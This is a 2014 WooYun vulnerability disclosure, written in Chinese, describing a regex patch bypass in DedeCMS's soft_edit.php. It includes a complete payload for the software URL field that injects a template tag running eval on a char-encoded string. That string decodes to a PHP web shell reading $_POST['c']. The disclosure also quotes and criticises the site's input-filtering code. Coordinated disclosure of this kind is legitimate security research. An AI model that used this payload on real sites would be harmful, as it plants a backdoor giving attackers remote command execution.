[公开漏洞]Dedecms某命令执行漏洞（续）

来源：WooYun　浏览：495次　时间：2014-06-12

Dedecms某命令执行漏洞（续）相关厂商： Dedecms 漏洞作者：kobin97 提交时间：2014-03-04 21:57 公开时间：2014-06-02 21:57 漏洞类型：命令执行危害等级：高自评Rank：15 漏洞状态：厂商已经确认漏洞来源：http://www.wooyun.org Tags标签：第三方不可信程序 php源码审核漏洞详情披露状态：

2014-03-04：细节已通知厂商并且等待厂商处理中
2014-03-05：厂商已经确认，细节仅向厂商公开
2014-03-08：细节向第三方安全合作伙伴开放
2014-03-15：细节向核心白帽子及相关领域专家公开
2014-03-25：细节向普通白帽子公开
2014-04-14：细节向实习白帽子公开
2014-06-02：细节向公众公开

简要描述：

很好，今天出的补丁修复了前面的漏洞了。但看了下20140228的补丁。。
你们是欺负我不懂正则么？

详细说明：

先看： WooYun: Dedecms某命令执行漏洞

20140228的补丁对soft_edit.php增加了

if(!preg_match("#[_=&///?\.a-zA-Z0-9-]+$#i", $softurl))

{

ShowMsg("确定软件地址提交正确!", "-1");

exit;

}

想问一下，这是神马正则？

任何一个字符都能让其匹配呀。。。

测试：

添加上传软件

本地地址 http://www.hao123.com

其它乱填就行，添加成功后，再次进入修改界面

软件地址改为：

http://www.hao123.com}x{/dede:link}{dede:a text'=x']=0;eval(chr(101).chr(118).chr(97).chr(108).chr(40).chr(34).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(59).chr(34).chr(41).chr(59));// }xxxx{/dede:a}{dede:link}xxx

注意，这里后面多了 xxx ，就是为了绕过这个正则补丁。

然后执行完全没有压力！

后来测试，在GPC OFF跟 ON下写入的地址有所区别，上面是在ON下写入的。

原因你们懂得。

在 filter.inc.php 中，你们不管 GPC ，全过滤了 addslashes。

而且对这样的$svar[$_k]直接返回错误的值了，这个BUG你们看着办吧。

function _FilterAll($fk, &$svar)

{

    global $cfg_notallowstr,$cfg_replacestr;

    if( is_array($svar) )

    {

        foreach($svar as $_k => $_v)

        {

            $svar[$_k] = _FilterAll($fk,$_v);

        }

    }

    else

    {

        if($cfg_notallowstr!='' && preg_match("#".$cfg_notallowstr."#i", $svar))

        {

            ShowMsg(" $fk has not allow words!",'-1');

            exit();

        }

        if($cfg_replacestr!='')

        {

            $svar = preg_replace('/'.$cfg_replacestr.'/i', "***", $svar);

        }

    }

    return addslashes($svar);

}



/* 对_GET,_POST,_COOKIE进行过滤 */

foreach(Array('_GET','_POST','_COOKIE') as $_request)

{

    foreach($$_request as $_k => $_v)

    {

        ${$_k} = _FilterAll($_k,$_v);

    }

}